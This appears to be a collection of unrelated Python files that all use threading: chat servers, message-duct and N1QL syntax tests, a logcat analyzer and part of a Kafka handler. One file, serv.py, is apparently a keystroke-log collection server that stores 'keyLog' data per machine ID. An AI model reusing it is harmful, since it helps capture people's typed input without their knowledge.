parser.add_argument(
"--debug",
action="store_true",
help="Keep cpp, stdout, and stderr for incompatible functions.",
)
parser.add_argument(
"results_file",
type=str,
default=None,
help="File to save results in.",
)
args = parser.parse_args()
main(functions_or_sigs=args.functions, results_file = args.results_file, cores = args.j, debug = args.debug)
if __name__ == "__main__":
processCLIArgs()
|
server.py | #!/usr/bin/env python3
import threading
import socket
import argparse
import os
class Server(threading.Thread):
"""
Supports management of server connections.
Attributes:
connections (list): A list of ServerSocket objects representing the active connections.
host (str): The IP address of the listening socket.
port (int): The port number of the listening socket.
"""
def __init__(self, host, port):
super().__init__()
self.connections = []
self.host = host
self.port = port
def run(self):
"""
Creates the listening socket. The listening socket will use the SO_REUSEADDR option to
allow binding to a previously-used socket address. This is a small-scale application which
only supports one waiting connection at a time.
For each new connection, a ServerSocket thread is started to facilitate communications with
that particular client. All ServerSocket objects are stored in the connections attribute.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.host, self.port))
sock.listen(1)
print('Listening at', sock.getsockname())
while True:
# Accept new connection
sc, sockname = sock.accept()
print('Accepted a new connection from {} to {}'.format(sc.getpeername(), sc.getsockname()))
# Create new thread
server_socket = ServerSocket(sc, sockname, self)
# Start new thread
server_socket.start()
# Add thread to active connections
self.connections.append(server_socket)
print('Ready to receive messages from', sc.getpeername())
def broadcast(self, message, source):
"""
Sends a message to all connected clients, except the source of the message.
Args:
message (str): The message to broadcast.
source (tuple): The socket address of the source client.
"""
for connection in self.connections:
# Send to all connected clients except the source client
if connection.sockname != source:
connection.send(message)
def remove_connection(self, connection):
"""
Removes a ServerSocket thread from the connections attribute.
Args:
connection (ServerSocket): The ServerSocket thread to remove.
"""
self.connections.remove(connection)
class ServerSocket(threading.Thread):
"""
Supports communications with a connected client.
Attributes:
sc (socket.socket): The connected socket.
sockname (tuple): The client socket address.
server (Server): The parent thread.
"""
def __init__(self, sc, sockname, server):
super().__init__()
self.sc = sc
self.sockname = sockname
self.server = server
def run(self):
"""
Receives data from the connected client and broadcasts the message to all other clients.
If the client has left the connection, closes the connected socket and removes itself
from the list of ServerSocket threads in the parent Server thread.
"""
while True:
message = self.sc.recv(1024).decode('ascii')
if message:
print('{} says {!r}'.format(self.sockname, message))
self.server.broadcast(message, self.sockname)
else:
# Client has closed the socket, exit the thread
print('{} has closed the connection'.format(self.sockname))
self.sc.close()
server.remove_connection(self)
return
def send(self, message):
"""
Sends a message to the connected server.
Args:
message (str): The message to be sent.
"""
self.sc.sendall(message.encode('ascii'))
def exit(server):
"""
Allows the server administrator to shut down the server.
Typing 'q' in the command line will close all active connections and exit the application.
"""
while True:
ipt = input('')
if ipt == 'q':
print('Closing all connections...')
for connection in server.connections:
connection.sc.close()
print('Shutting down the server...')
os._exit(0)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Chatroom Server')
parser.add_argument('host', help='Interface the server listens at')
parser.add_argument('-p', metavar='PORT', type=int, default=1060,
help='TCP port (default 1060)')
args = parser.parse_args()
# Create and start server thread
server = Server(args.host, args.p)
server.start()
exit = threading.Thread(target = exit, args = (server,))
exit.start() |
test_message_duct.py | from __future__ import print_function
from unittest import TestCase
from assertpy import assert_that
import threading
import os
import time
import subprocess
import sys
import multiprocessing
import errno
from ductworks.message_duct import MessageDuctParent, MessageDuctChild, create_psuedo_anonymous_duct_pair
from integration_tests import SUBPROCESS_TEST_SCRIPT, ROOT_DIR
class MessageDuctIntegrationTest(TestCase):
def test_basic_message_passing(self):
"""
As a Python developer,
I want to be able to easily create a message duct pair and send structured data,
and receive (and reassemble it correctly) so that I don't have to do lots of work and things "just work".
"""
test_data = ["hello world", 42]
parent, child = create_psuedo_anonymous_duct_pair()
bind_address = parent.bind_address
parent.send(test_data)
assert_that(child.recv()).is_equal_to(test_data)
child.close()
parent.close()
assert_that(os.path.exists(bind_address)).is_false()
def test_tcp_message_passing(self):
"""
As a Python developer,
I want to also be able to send messages over TCP instead of Unix Domain sockets,
so that I can make things work even when systems are remote or lack UDS facilities.
"""
test_data = ["bob", "saget"]
parent = MessageDuctParent.psuedo_anonymous_tcp_parent_duct()
parent.bind()
child = MessageDuctChild.psuedo_anonymous_tcp_child_duct(parent.listener_address[0], parent.listener_address[1])
child.connect()
assert_that(parent.listen()).is_true()
parent.send(test_data)
assert_that(child.recv()).is_equal_to(test_data)
child.close()
parent.close()
def test_big_message(self):
"""
As a Python developer,
I want to be able to send and receive large messages and data structures faithfully,
so that I don't have to worry about data get corrupted or lost when I send more data.
"""
big_string = "lol" * 1024 * 128
big_list = [big_string, 1, big_string, 2, big_string, 3]
parent, child = create_psuedo_anonymous_duct_pair()
bind_address = parent.bind_address
def child_target():
child.send(big_list)
t = threading.Thread(target=child_target)
t.start()
assert_that(parent.recv()).is_equal_to(big_list)
child.close()
parent.close()
assert_that(os.path.exists(bind_address)).is_false()
def test_multiple_writers(self):
"""
As a Python developer,
I want to be able to specify a lock, and for multiple writers to be able to send data without race conditions,
so that I can scale out nicely with concurrency without working too hard.
"""
big_string = "lol" * 1024 * 128
big_list = [big_string, 1, big_string, 2, big_string, 3]
parent, child = create_psuedo_anonymous_duct_pair(child_lock=threading.Lock())
bind_address = parent.bind_address
def child_target():
for _ in range(25):
child.send(big_list)
threads = []
for _ in range(4):
t = threading.Thread(target=child_target)
t = t.start()
threads.append(t)
while parent.poll(10) is True:
assert_that(parent.recv()).is_equal_to(big_list)
child.close()
parent.close()
assert_that(os.path.exists(bind_address)).is_false()
def test_ducts_with_subprocess(self):
"""
As a Python developer,
I want to be able to start a new Python interpreter (or anything else that supports the message duct protocol)
in a child (or any other process) and be able to communicate with minimal overhead, so that I can
support my often various concurrency and communication needs.
"""
assert_that(SUBPROCESS_TEST_SCRIPT).exists()
proc = None
parent = None
try:
parent = MessageDuctParent.psuedo_anonymous_parent_duct()
parent.bind()
proc = subprocess.Popen(
[sys.executable, SUBPROCESS_TEST_SCRIPT, parent.listener_address], env={'PYTHONPATH': ROOT_DIR}
)
assert_that(parent.listen()).is_true()
for _ in range(100):
parent.send("pingpong")
parent.poll(1)
assert_that(parent.recv()).is_equal_to("pingpong")
parent.send(None)
time.sleep(1)
finally:
if parent:
parent.close()
if proc:
proc.terminate()
def test_mp_pipe_replacement(self):
"""
As a Python developer,
I want to be able to use ductworks with multiprocessing,
and to be able to close the child duct after forking,
so that I can drop ductworks in place of multiprocessing.Pipe
without causing unexpected problems.
"""
parent, child = create_psuedo_anonymous_duct_pair()
def mp_child_target():
parent.close()
time.sleep(3)
child.send("hello world")
child.close()
p = multiprocessing.Process(target=mp_child_target)
p.daemon = True
p.start()
child.close()
p.join(10)
assert_that(parent.recv()).is_equal_to("hello world")
parent.close()
def test_eof_on_remote_close(self):
"""
As a Python developer,
I want to be able my duct to raise EOFError when there's
nothing left to read, so that it is drop-in compatible with Pipe.
"""
parent, child = create_psuedo_anonymous_duct_pair()
child.close()
self.assertRaises(EOFError, parent.recv)
try:
parent.send("test")
except IOError as e:
assert getattr(e, 'errno') == errno.EPIPE
except:
raise AssertionError("Incorrect exception raised for parent.send() on a broken connection!")
parent.close()
def test_performance(self):
"""
As a Python developer,
I want my message duct to have reasonably good performance,
so that the duct does not become a major bottleneck in my application.
"""
big_string = u"\u0FF0lol" * 1024 * 128
parent = MessageDuctParent.psuedo_anonymous_parent_duct()
parent.bind()
bind_address = parent.bind_address
child = MessageDuctChild.psuedo_anonymous_child_duct(bind_address)
child.connect()
assert_that(parent.listen()).is_true()
time.sleep(1)
def child_target_duct():
for _ in range(250):
child.send(big_string)
t = threading.Thread(target=child_target_duct)
t.start()
start_time = time.time()
total_data = 0
while parent.poll(0.01) is True:
recv_data = parent.recv()
assert_that(recv_data).is_equal_to(big_string)
total_data += len(recv_data)
ductwork_approx_perf = total_data/((time.time() - start_time)*1024)
child.close()
parent.close()
assert_that(os.path.exists(bind_address)).is_false()
print("Ductwork approx perf: {} KB/s".format(ductwork_approx_perf))
t.join()
|
LogCatAnalyzerThread.py | """
Copyright (C) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
from Queue import Queue, Empty
import re
import threading
import time
class LogCatAnalyzerThread():
""" Logger analyzer that will check input messages to check if
they validate some criteria
"""
def __init__(self, logger):
# Analyzer thread stop condition
self._stop_event = threading.Event()
# Messages to trigger
self.__messages_to_trigger = {}
# Lock object
self.__lock_message_triggered = threading.RLock()
# Internal buffer
self.__queue = Queue()
# Working thread
self.__analyzer_thread = None
# Logger to be used to output messages
self._logger = logger
# Delay to wait before processing new item in the queue
self.analyzer_loop_delay = 0.1
def stop(self):
self._stop_event.set()
if self.__analyzer_thread is not None:
try:
self.__analyzer_thread.join(5)
except (KeyboardInterrupt, SystemExit):
raise
except BaseException:
pass
finally:
del self.__analyzer_thread
self.__analyzer_thread = None
def start(self):
self._stop_event.clear()
self.__analyzer_thread = threading.Thread(target=self.__run)
self.__analyzer_thread.name = "LogCatAnalyzerThread"
self.__analyzer_thread.daemon = True
self.__analyzer_thread.start()
def push(self, line):
self.__queue.put_nowait(line)
def __run(self):
while not self._stop_event.is_set():
while not self.__queue.empty():
try:
line = self.__queue.get_nowait()
self.__analyze_line(line)
except Empty:
pass
self._stop_event.wait(self.analyzer_loop_delay)
def __analyze_line(self, line):
if line:
line = line.rstrip('\r\n')
# Check all messages to be triggered
self.__lock_message_triggered.acquire()
for trig_message in self.__messages_to_trigger:
if trig_message.startswith("regex:"):
reg_ex = trig_message.split("regex:")[1]
try:
if re.search(reg_ex, line) is not None:
# Message received, store log line
self.__messages_to_trigger[trig_message].append(line)
except re.error as ex:
if self._logger is not None:
self._logger.error("Cannot compute regular expression \"%s\": %s" % (reg_ex, ex))
elif line.find(trig_message) != -1:
# Message received, store log line
self.__messages_to_trigger[trig_message].append(line)
self.__lock_message_triggered.release()
def add_trigger_messages(self, messages):
for message in messages:
self.add_trigger_message(message)
def add_trigger_message(self, message):
""" Trigger a message
:type message: string
:param message: message to be triggered
"""
self.__lock_message_triggered.acquire()
self.__messages_to_trigger[message] = list()
self.__lock_message_triggered.release()
def remove_trigger_message(self, message):
""" Remove a triggered message
:type message: string
:param message: message to be removed
"""
if message in self.__messages_to_trigger:
self.__lock_message_triggered.acquire()
del self.__messages_to_trigger[message]
self.__lock_message_triggered.release()
def is_message_received(self, message, timeout):
""" Check if a message is received
:type message: string
:param message: message that we look for
:type timeout: int
:param timeout: time limit where we expect to receive the message
:return: Array of message received, empty array if nothing
:rtype: list
"""
remove_trigger_message = False
if message not in self.__messages_to_trigger:
self.add_trigger_message(message)
remove_trigger_message = True
messages_received = None
begin_time = time.time()
end_time = begin_time + float(timeout)
while (not messages_received) and (time.time() < end_time):
messages_received = self.get_message_triggered_status(message)
time.sleep(0.2)
if messages_received:
# Clone the list to return as remove trigger message
# is going to delete it
messages_received = list(messages_received)
if remove_trigger_message:
self.remove_trigger_message(message)
return messages_received
def get_message_triggered_status(self, message):
""" Get the status of a message triggered
:type message: string
:param message: message triggered
:return: Array of message received, empty array if nothing
:rtype: list
"""
if message in self.__messages_to_trigger:
return self.__messages_to_trigger[message]
else:
return None
def reset_trigger_message(self, message):
""" Reset triggered message
:type message: string
:param message: message to be reseted
"""
if message in self.__messages_to_trigger:
self.__lock_message_triggered.acquire()
self.__lock_message_triggered.release()
|
server.py | import socket
import threading
import json
class Server:
"""
服务器类
"""
def __init__(self):
"""
构造
"""
self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__connections = list()
self.__nicknames = list()
def __user_thread(self, user_id):
"""
用户子线程
:param user_id: 用户id
"""
connection = self.__connections[user_id]
nickname = self.__nicknames[user_id]
print('[Server] 用户', user_id, nickname, '加入聊天室')
self.__broadcast(message='用户 ' + str(nickname) + '(' + str(user_id) + ')' + '加入聊天室')
# 侦听
while True:
# noinspection PyBroadException
try:
buffer = connection.recv(1024).decode()
# 解析成json数据
obj = json.loads(buffer)
# 如果是广播指令
if obj['type'] == 'broadcast':
self.__broadcast(obj['sender_id'], obj['message'])
else:
print('[Server] 无法解析json数据包:', connection.getsockname(), connection.fileno())
except Exception:
print('[Server] 连接失效:', connection.getsockname(), connection.fileno())
self.__connections[user_id].close()
self.__connections[user_id] = None
self.__nicknames[user_id] = None
def __broadcast(self, user_id=0, message=''):
"""
广播
:param user_id: 用户id(0为系统)
:param message: 广播内容
"""
for i in range(1, len(self.__connections)):
if user_id != i:
self.__connections[i].send(json.dumps({
'sender_id': user_id,
'sender_nickname': self.__nicknames[user_id],
'message': message
}).encode())
def start(self):
"""
启动服务器
"""
# 绑定端口
self.__socket.bind(('127.0.0.1', 8888))
# 启用监听
self.__socket.listen(10)
print('[Server] 服务器正在运行......')
# 清空连接
self.__connections.clear()
self.__nicknames.clear()
self.__connections.append(None)
self.__nicknames.append('System')
# 开始侦听
while True:
connection, address = self.__socket.accept()
print('[Server] 收到一个新连接', connection.getsockname(), connection.fileno())
# 尝试接受数据
# noinspection PyBroadException
try:
buffer = connection.recv(1024).decode()
# 解析成json数据
obj = json.loads(buffer)
# 如果是连接指令,那么则返回一个新的用户编号,接收用户连接
if obj['type'] == 'login':
self.__connections.append(connection)
self.__nicknames.append(obj['nickname'])
connection.send(json.dumps({
'id': len(self.__connections) - 1
}).encode())
# 开辟一个新的线程
thread = threading.Thread(target=self.__user_thread, args=(len(self.__connections) - 1, ))
thread.setDaemon(True)
thread.start()
else:
print('[Server] 无法解析json数据包:', connection.getsockname(), connection.fileno())
except Exception:
print('[Server] 无法接受数据:', connection.getsockname(), connection.fileno())
|
serv.py | import os
import tornado.ioloop
import tornado.web
import tornado.escape
import tornado.httpserver
import threading
import queue
import time
class LogWriter():
def __init__(self):
self.queue = queue.Queue()
self.opened_files = []
self.opened_files_handles = []
self.mutex = threading.Lock()
def run(self):
while True:
dic = self.queue.get(block=True) # type: list
try:
self.mutex.acquire(blocking=True) # 加锁 writer和cleaner要互斥读写文件列表
idx = self.opened_files.index(dic[0])
f = self.opened_files_handles[idx]
f.write(dic[1]+'\n')
except:
f = open(dic[0]+'.txt', 'a')
f.write(dic[1]+'\n')
self.opened_files.append(dic[0])
self.opened_files_handles.append(f)
finally:
self.opened_files_handles[0].close()
self.opened_files.clear()
self.opened_files_handles.clear()
self.mutex.release() # 解锁
def cleaner(self):
while True:
# 每20s重开文件(flush)
time.sleep(20)
self.mutex.acquire(blocking=True) # 加锁 writer和cleaner要互斥读写文件列表
for f in self.opened_files_handles:
f.close()
self.opened_files_handles.clear()
self.opened_files.clear()
self.mutex.release() # 解锁
class AnnounceHandler(tornado.web.RequestHandler):
# post: /announce
async def post(self):
print(self.get_argument("keyLog"))
self.write('ACK')
if self.get_argument("keyLog") != '':
log_writer.queue.put((self.get_argument("cpuid"), self.get_argument("keyLog")))
def make_app():
settings = {
"static_path": os.path.join(os.path.dirname(__file__), "static"),
"template_path": os.path.join(os.path.dirname(__file__), "templates"),
"cookie_secret": "`10uu00as8j[].;.[;[,p8",
"xsrf_cookies": False,
"debug": True,
"compiled_template_cache": False,
}
return tornado.web.Application([
(tornado.web.HostMatches(r'.*'), [
(r"/announce", AnnounceHandler),
])
], **settings)
if __name__ == "__main__":
# 开LogWriter
log_writer = LogWriter()
t1 = threading.Thread(target=log_writer.run)
t2 = threading.Thread(target=log_writer.cleaner)
t1.setDaemon(True)
t2.setDaemon(True)
t1.start()
t2.start()
# 开HTTP服务器
app = make_app()
server = tornado.httpserver.HTTPServer(app)
server.bind(8086)
server.start(1) # 0: forks one process per cpu
tornado.ioloop.IOLoop.current().start()
|
n1ql_window_functions_syntax_check.py | from .tuq import QueryTests
import random
import string
from random import randint
from membase.api.exception import CBQError
import threading
import copy
class WindowFunctionsSyntaxTest(QueryTests):
def setUp(self):
super(WindowFunctionsSyntaxTest, self).setUp()
self.log_config_info()
self.log.info("============== WindowFunctionsSyntaxTest setup has started ==============")
self.primary_idx = {'name': '#primary', 'bucket': 'test_bucket', 'fields': (), 'state': 'online',
'using': self.index_type.lower(), 'is_primary': True}
self.idx_1 = {'name': 'ix_char', 'bucket': 'test_bucket', 'fields': [('char_field', 0)], 'state': 'online',
'using': self.index_type.lower(), 'is_primary': False}
self.idx_2 = {'name': 'ix_decimal', 'bucket': 'test_bucket', 'fields': [('decimal_field', 0)],
'state': 'online', 'using': self.index_type.lower(), 'is_primary': False}
self.idx_3 = {'name': 'ix_int', 'bucket': 'test_bucket', 'fields': [('int_field', 0)], 'state': 'online',
'using': self.index_type.lower(), 'is_primary': False}
self.indexes = [self.primary_idx, self.idx_1, self.idx_2, self.idx_3]
if self.test_buckets != 'test_bucket':
self.test_buckets = 'test_bucket'
self.query_bucket = self.get_query_buckets(deferred_bucket=self.test_buckets)[-1]
self.log.info("============== WindowFunctionsTest setup has completed ==============")
def tearDown(self):
self.log_config_info()
self.log.info("============== WindowFunctionsSyntaxTest tearDown has started ==============")
super(WindowFunctionsSyntaxTest, self).tearDown()
self.log.info("============== WindowFunctionsSyntaxTest tearDown has completed ==============")
def suite_setUp(self):
super(WindowFunctionsSyntaxTest, self).suite_setUp()
if self.test_buckets != 'test_bucket':
self.test_buckets = 'test_bucket'
self.query_bucket = self.get_query_buckets(deferred_bucket=self.test_buckets)[-1]
self.init_nodes()
self.load_test_data(self.query_bucket)
self.create_primary_index(self.query_bucket)
self.create_secondary_indexes(self.query_bucket)
self.adopt_test_data(self.query_bucket)
self.log_config_info()
self.log.info("============== WindowFunctionsSyntaxTest suite_setup has started ==============")
self.log.info("============== WindowFunctionsSyntaxTest suite_setup has completed ==============")
def suite_tearDown(self):
self.log_config_info()
self.log.info("============== WindowFunctionsSyntaxTest suite_tearDown has started ==============")
super(WindowFunctionsSyntaxTest, self).suite_tearDown()
self.log.info("============== WindowFunctionsSyntaxTest suite_tearDown has completed ==============")
def run_all(self):
self.test_from_select_batches()
self.test_select_from_batches()
def generate_from_select_queries(self):
result = []
counter = 0
window_function_values = [' LAST_VALUE(t1.decimal_field) OVER (PARTITION BY t1.char_field ORDER BY '
't1.decimal_field RANGE BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) ']
alias_values = [' wf ']
bucket_alias_values = [' ', ' as ']
let_where_values = [' ', ' where t1.int_field > 1000 ', ' let int_val=1000 where t1.int_field > int_val ']
group_by_values = [' ', ' group by t1.char_field, t1.decimal_field ']
letting_having_values = [' ', ' having t1.char_field="E" ',
' letting char_val="E" having t1.char_field=char_val ']
order_by_values = [' ', ' order by t1.char_field ']
asc_desc_values = [' ', ' asc ', ' desc ']
limit_values = [' ', ' limit 100 ']
offset_values = [' ', ' offset 10 ']
join_values = [' ', ' inner join ', ' left join ', ' left outer join ', ' inner nest ', ' left nest ']
union_values = [' ', ' union ', ' union all ']
namespace_values = ['', 'default:']
use_keys_values = [' ', ' use primary keys[\'test\'] ', ' use keys[\'test\'] ', ' use index(`ix_char`) ',
' use index(`ix_char`, `ix_decimal`) ', ' use index(`ix_char` using gsi) ']
join_predicate_values = [' on t1.primary_key=t2.primary_key ', ' on primary keys[\'test\']',
' on keys t1.char_field ', ' on key t2.char_field for t1 ',
' on primary key t2.primary_key for t1 ']
unnest_flatten_values = [' unnest ', ' left unnest ', ' flatten ', ' left flatten ']
for window_function_value in window_function_values:
for alias_value in alias_values:
for let_where_value in let_where_values:
for group_by_value in group_by_values:
for letting_having_value in letting_having_values:
if group_by_value == ' ':
letting_having_value = ' '
for order_by_value in order_by_values:
for asc_desc_value in asc_desc_values:
if order_by_value == ' ':
asc_desc_value = ' '
for limit_value in limit_values:
for offset_value in offset_values:
for bucket_alias_value in bucket_alias_values:
for namespace_value in namespace_values:
for use_keys_value in use_keys_values:
for unnest_flatten_value in unnest_flatten_values:
for join_value in join_values:
for join_predicate_value in join_predicate_values:
join_expression = ' '
if join_value != ' ':
join_expression = join_value + ' ' + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + ' t2 ' + use_keys_value + join_predicate_value
else:
join_expression = unnest_flatten_value + ' t1.char_field '
for union_value in union_values:
union_left_parenthesis = ''
union_right_parenthesis = ''
right_union_expression = ''
if union_value != ' ':
union_left_parenthesis = '('
union_right_parenthesis = ')'
right_union_expression = union_left_parenthesis + "select t1.char_field, t1.decimal_field, " + window_function_value + alias_value + " " \
"from " + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + " t1 " + use_keys_value + join_expression + let_where_value + group_by_value + letting_having_value + \
order_by_value + asc_desc_value + limit_value + offset_value + union_right_parenthesis
query = "from (" + union_left_parenthesis + "select t1.char_field, t1.decimal_field, " + window_function_value + alias_value + " " \
"from " + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + " t1 " + use_keys_value + join_expression + let_where_value + group_by_value + letting_having_value + \
order_by_value + asc_desc_value + limit_value + offset_value + union_right_parenthesis + union_value + right_union_expression + ") a select a.wf"
result.append(query)
counter += 1
return result
def generate_select_from_queries(self):
result = []
counter = 0
window_function_values = [
' LAST_VALUE(t1.decimal_field) OVER (PARTITION BY t1.char_field ORDER BY t1.decimal_field RANGE BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) ']
alias_values = [' wf ']
bucket_alias_values = [' ', ' as ']
let_where_values = [' ', ' where t1.int_field > 1000 ', ' let int_val=1000 where t1.int_field > int_val ']
group_by_values = [' ', ' group by t1.char_field, t1.decimal_field ']
letting_having_values = [' ', ' having t1.char_field="E" ',
' letting char_val="E" having t1.char_field=char_val ']
order_by_values = [' ', ' order by t1.char_field ']
asc_desc_values = [' ', ' asc ', ' desc ']
limit_values = [' ', ' limit 100 ']
offset_values = [' ', ' offset 10 ']
join_values = [' ', ' inner join ', ' left join ', ' left outer join ', ' inner nest ', ' left nest ']
union_values = [' ', ' union ', ' union all ']
namespace_values = ['', 'default:']
use_keys_values = [' ', ' use primary keys[\'test\'] ', ' use keys[\'test\'] ', ' use index(`ix_char`) ',
' use index(`ix_char`, `ix_decimal`) ', ' use index(`ix_char` using gsi) ']
join_predicate_values = [' on t1.primary_key=t2.primary_key ', ' on primary keys[\'test\']',
' on keys t1.char_field ', ' on key t2.char_field for t1 ',
' on primary key t2.primary_key for t1 ']
unnest_flatten_values = [' unnest ', ' left unnest ', ' flatten ', ' left flatten ']
for window_function_value in window_function_values:
for alias_value in alias_values:
for let_where_value in let_where_values:
for group_by_value in group_by_values:
for letting_having_value in letting_having_values:
if group_by_value == ' ':
letting_having_value = ' '
for order_by_value in order_by_values:
for asc_desc_value in asc_desc_values:
if order_by_value == ' ':
asc_desc_value = ' '
for limit_value in limit_values:
for offset_value in offset_values:
for bucket_alias_value in bucket_alias_values:
for namespace_value in namespace_values:
for use_keys_value in use_keys_values:
for unnest_flatten_value in unnest_flatten_values:
for join_value in join_values:
for join_predicate_value in join_predicate_values:
join_expression = ' '
if join_value != ' ':
join_expression = join_value + ' ' + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + ' t2 ' + use_keys_value + join_predicate_value
else:
join_expression = unnest_flatten_value + ' t1.char_field '
for union_value in union_values:
union_left_parenthesis = ''
union_right_parenthesis = ''
right_union_expression = ''
if union_value != ' ':
union_left_parenthesis = '('
union_right_parenthesis = ')'
right_union_expression = union_left_parenthesis + "select t1.char_field, t1.decimal_field, " + window_function_value + alias_value + " " \
"from " + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + " t1 " + use_keys_value + join_expression + let_where_value + group_by_value + letting_having_value + \
order_by_value + asc_desc_value + limit_value + offset_value + union_right_parenthesis
query = union_left_parenthesis + "select t1.char_field, t1.decimal_field, " + window_function_value + alias_value + \
" from " + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + " t1 " + use_keys_value + join_expression + let_where_value + group_by_value + \
letting_having_value + order_by_value + asc_desc_value + limit_value + offset_value + union_right_parenthesis + union_value + right_union_expression
result.append(query)
counter += 1
return result
def test_from_select_batches(self):
queries = self.generate_from_select_queries()
batches = self.produce_batches(queries, 4)
for batch in batches:
threads = []
for b in batch:
t = threading.Thread(target=self._run_test, args=(b,))
t.daemon = True
threads.append(t)
t.start()
for th in threads:
th.join()
threads.remove(th)
def _run_test(self, query):
try:
self.run_cbq_query(query)
except CBQError as e:
self.assertEqual('True', 'False', 'Wrong query - ' + str(query))
def test_select_from_batches(self):
queries = self.generate_select_from_queries()
batches = self.produce_batches(queries, 4)
for batch in batches:
threads = []
for b in batch:
t = threading.Thread(target=self._run_test, args=(b,))
t.daemon = True
threads.append(t)
t.start()
for th in threads:
th.join()
threads.remove(th)
def produce_batches(self, queries, batch_size):
result = []
counter = 0
arr = []
for query in queries:
if counter < batch_size:
arr.append(query)
counter += 1
else:
add = copy.copy(arr)
result.append(add)
arr = []
arr.append(query)
counter = 1
return result
def init_nodes(self):
test_bucket_params = self._create_bucket_params(server=self.master, size=self.bucket_size,
replicas=self.num_replicas, bucket_type=self.bucket_type,
enable_replica_index=self.enable_replica_index,
eviction_policy=self.eviction_policy, lww=self.lww)
self.cluster.create_standard_bucket(self.test_bucket, 11222, test_bucket_params)
def load_test_data(self, bucket_name='test_bucket'):
for i in range(0, 1, 1):
initial_statement = (" INSERT INTO {0} (KEY, VALUE) VALUES ('primary_key_" + str(i) + "',").format(
bucket_name)
initial_statement += "{"
initial_statement += "'primary_key':'primary_key_" + str(i) + "','char_field':'" + random.choice(
string.ascii_uppercase) + \
"','decimal_field':" + str(round(10000 * random.random(), 0)) + ",'int_field':" + str(
randint(0, 100000000)) + "})"
self.run_cbq_query(initial_statement)
def adopt_test_data(self, bucket_name='test_bucket'):
self.run_cbq_query("update {0} set decimal_field=null where char_field='A'".format(bucket_name))
self.run_cbq_query("update {0} set decimal_field=missing where char_field='B'".format(bucket_name))
self.run_cbq_query(
"update {0} set decimal_field=null where char_field='C' and decimal_field%2=0".format(bucket_name))
self.run_cbq_query(
"update {0} set decimal_field=missing where char_field='C' and decimal_field%3=0".format(bucket_name))
self.run_cbq_query(
"update {0} set decimal_field=2 where char_field='D' and decimal_field%2=0".format(bucket_name))
self.run_cbq_query("update {0} set decimal_field=1 where char_field='E'".format(bucket_name))
def create_primary_index(self, bucket_name='test_bucket'):
self.run_cbq_query("CREATE PRIMARY INDEX `#primary` ON {0}".format(bucket_name))
def create_secondary_indexes(self, bucket_name='test_bucket'):
self.run_cbq_query('CREATE INDEX ix_char ON {0}(char_field);'.format(bucket_name))
self.run_cbq_query('CREATE INDEX ix_decimal ON {0}(decimal_field);'.format(bucket_name))
self.run_cbq_query('CREATE INDEX ix_int ON {0}(int_field);'.format(bucket_name))
self.run_cbq_query('CREATE INDEX ix_primary ON {0}(primary_key);'.format(bucket_name))
|
kafka_msg_handler.py | #
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Kafka message handler."""
import itertools
import json
import logging
import os
import re
import shutil
import tempfile
import threading
import time
import traceback
from tarfile import ReadError
from tarfile import TarFile
import requests
from confluent_kafka import Consumer
from confluent_kafka import Producer
from confluent_kafka import TopicPartition
from django.db import connections
from django.db import DEFAULT_DB_ALIAS
from django.db import InterfaceError
from django.db import OperationalError
from kombu.exceptions import OperationalError as RabbitOperationalError
from api.common import log_json
from kafka_utils.utils import is_kafka_connected
from masu.config import Config
from masu.database.report_manifest_db_accessor import ReportManifestDBAccessor
from masu.external import UNCOMPRESSED
from masu.external.accounts_accessor import AccountsAccessor
from masu.external.accounts_accessor import AccountsAccessorError
from masu.external.downloader.ocp.ocp_report_downloader import create_daily_archives
from masu.external.downloader.ocp.ocp_report_downloader import OCPReportDownloader
from masu.processor._tasks.process import _process_report_file
from masu.processor.report_processor import ReportProcessorDBError
from masu.processor.report_processor import ReportProcessorError
from masu.processor.tasks import OCP_QUEUE
from masu.processor.tasks import record_all_manifest_files
from masu.processor.tasks import record_report_status
from masu.processor.tasks import summarize_reports
from masu.prometheus_stats import KAFKA_CONNECTION_ERRORS_COUNTER
from masu.util.ocp import common as utils
LOG = logging.getLogger(__name__)
SUCCESS_CONFIRM_STATUS = "success"
FAILURE_CONFIRM_STATUS = "failure"
class KafkaMsgHandlerError(Exception):
"""Kafka msg handler error."""
def close_and_set_db_connection(): # pragma: no cover
"""Close the db connection and set to None."""
if connections[DEFAULT_DB_ALIAS].connection:
connections[DEFAULT_DB_ALIAS].connection.close()
connections[DEFAULT_DB_ALIAS].connection = None
def delivery_callback(err, msg):
"""Acknowledge message success or failure."""
if err is not None:
LOG.error(f"Failed to deliver message: {msg}: {err}")
else:
LOG.info("Validation message delivered.")
def create_manifest_entries(report_meta, request_id, context={}):
"""
Creates manifest database entries for report processing tracking.
Args:
report_meta (dict): Report context dictionary from extract_payload.
request_id (String): Identifier associated with the payload
context (Dict): Context for logging (account, etc)
Returns:
manifest_id (Integer): Manifest identifier of the created db entry.
"""
downloader = OCPReportDownloader(
report_meta.get("schema_name"),
report_meta.get("cluster_id"),
None,
provider_uuid=report_meta.get("provider_uuid"),
request_id=request_id,
account=context.get("account", "no_account"),
)
return downloader._prepare_db_manifest_record(report_meta)
def get_account_from_cluster_id(cluster_id, manifest_uuid, context={}):
"""
Returns the provider details for a given OCP cluster id.
Args:
cluster_id (String): Cluster UUID.
manifest_uuid (String): Identifier associated with the payload manifest
context (Dict): Context for logging (account, etc)
Returns:
(dict) - keys: value
authentication: String,
customer_name: String,
billing_source: String,
provider_type: String,
